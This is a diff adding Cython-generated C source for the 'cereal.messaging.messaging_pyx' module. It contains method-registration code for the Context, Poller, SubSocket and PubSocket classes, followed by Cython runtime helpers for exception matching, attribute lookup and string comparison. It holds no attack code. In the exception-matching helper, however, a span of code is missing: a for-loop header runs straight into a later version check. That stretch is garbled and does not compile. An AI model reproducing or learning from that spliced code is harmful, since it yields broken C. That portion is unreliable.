__Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Context___reduce_cython, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__30)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_3) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_7Context_9__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Context___setstate_cython, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__31)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_3) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":145 + * del self.poller + * + * def registerSocket(self, SubSocket socket): # <<<<<<<<<<<<<< + * self.sub_sockets.append(socket) + * self.poller.registerSocket(socket.socket) + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_6Poller_5registerSocket, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Poller_registerSocket, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__33)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 145, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller->tp_dict, __pyx_n_s_registerSocket, __pyx_t_3) < 0) __PYX_ERR(0, 145, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller); + + /* "cereal/messaging/messaging_pyx.pyx":149 + * self.poller.registerSocket(socket.socket) + * + * def poll(self, timeout): # <<<<<<<<<<<<<< + * sockets = [] + * cdef int t = timeout + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_6Poller_7poll, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Poller_poll, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__35)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller->tp_dict, __pyx_n_s_poll, __pyx_t_3) < 0) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_6Poller_9__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Poller___reduce_cython, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__36)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_3) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_6Poller_11__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Poller___setstate_cython, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__37)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_3) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":186 + * self.socket = ptr + * + * def connect(self, Context context, string endpoint, string address=b"127.0.0.1", bool conflate=False): # <<<<<<<<<<<<<< + * r = self.socket.connect(context.context, endpoint, address, conflate) + * + */ + __pyx_t_7 = __pyx_convert_string_from_py_std__in_string(__pyx_kp_b_127_0_0_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L1_error) + __pyx_k__3 = __pyx_t_7; + __pyx_t_7 = __pyx_convert_string_from_py_std__in_string(__pyx_kp_b_127_0_0_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L1_error) + __pyx_t_3 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_3); + __Pyx_INCREF(Py_False); + __Pyx_GIVEREF(Py_False); + PyTuple_SET_ITEM(__pyx_t_5, 1, Py_False); + __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_9SubSocket_5connect, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_SubSocket_connect, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__39)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_3, __pyx_t_5); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket->tp_dict, __pyx_n_s_connect, __pyx_t_3) < 0) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket); + + /* "cereal/messaging/messaging_pyx.pyx":195 + * raise MessagingError(endpoint) + * + * def setTimeout(self, int timeout): # <<<<<<<<<<<<<< + * self.socket.setTimeout(timeout) + * + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_9SubSocket_7setTimeout, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_SubSocket_setTimeout, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__40)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 195, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket->tp_dict, __pyx_n_s_setTimeout, __pyx_t_3) < 0) __PYX_ERR(0, 195, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket); + + /* "cereal/messaging/messaging_pyx.pyx":198 + * self.socket.setTimeout(timeout) + * + * def receive(self, bool non_blocking=False): # <<<<<<<<<<<<<< + * msg = self.socket.receive(non_blocking) + * + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_9SubSocket_9receive, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_SubSocket_receive, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__42)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 198, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_3, __pyx_tuple__43); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket->tp_dict, __pyx_n_s_receive, __pyx_t_3) < 0) __PYX_ERR(0, 198, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_9SubSocket_11__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_SubSocket___reduce_cython, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__44)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_3) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_9SubSocket_13__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_SubSocket___setstate_cython, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__45)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_3) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":227 + * del self.socket + * + * def connect(self, Context context, string endpoint): # <<<<<<<<<<<<<< + * r = self.socket.connect(context.context, endpoint) + * + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_9PubSocket_5connect, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_PubSocket_connect, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__47)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 227, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket->tp_dict, __pyx_n_s_connect, __pyx_t_3) < 0) __PYX_ERR(0, 227, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket); + + /* "cereal/messaging/messaging_pyx.pyx":236 + * raise MessagingError(endpoint) + * + * def send(self, bytes data): # <<<<<<<<<<<<<< + * length = len(data) + * r = self.socket.send(data, length) + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_9PubSocket_7send, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_PubSocket_send, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__49)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 236, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket->tp_dict, __pyx_n_s_send, __pyx_t_3) < 0) __PYX_ERR(0, 236, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket); + + /* "cereal/messaging/messaging_pyx.pyx":246 + * raise MessagingError + * + * def all_readers_updated(self): # <<<<<<<<<<<<<< + * return self.socket.all_readers_updated() + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_9PubSocket_9all_readers_updated, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_PubSocket_all_readers_updated, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__50)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 246, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket->tp_dict, __pyx_n_s_all_readers_updated, __pyx_t_3) < 0) __PYX_ERR(0, 246, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_9PubSocket_11__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_PubSocket___reduce_cython, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__51)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_3) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9messaging_13messaging_pyx_9PubSocket_13__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_PubSocket___setstate_cython, NULL, __pyx_n_s_cereal_messaging_messaging_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__52)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_3) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":1 + * # distutils: language = c++ # <<<<<<<<<<<<<< + * # cython: c_string_encoding=ascii, language_level=3 + * + */ + __pyx_t_3 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_3) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init cereal.messaging.messaging_pyx", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init cereal.messaging.messaging_pyx"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* PyObjectGetAttrStrNoError */ +static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* GetBuiltinName */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name) { + PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); + if (unlikely(!result) && !PyErr_Occurred()) { + PyErr_Format(PyExc_NameError, +#if PY_MAJOR_VERSION >= 3 + "name '%U' is not defined", name); +#else + "name '%.200s' is not defined", PyString_AS_STRING(name)); +#endif + } + return result; +} + +/* TupleAndListFromArray */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 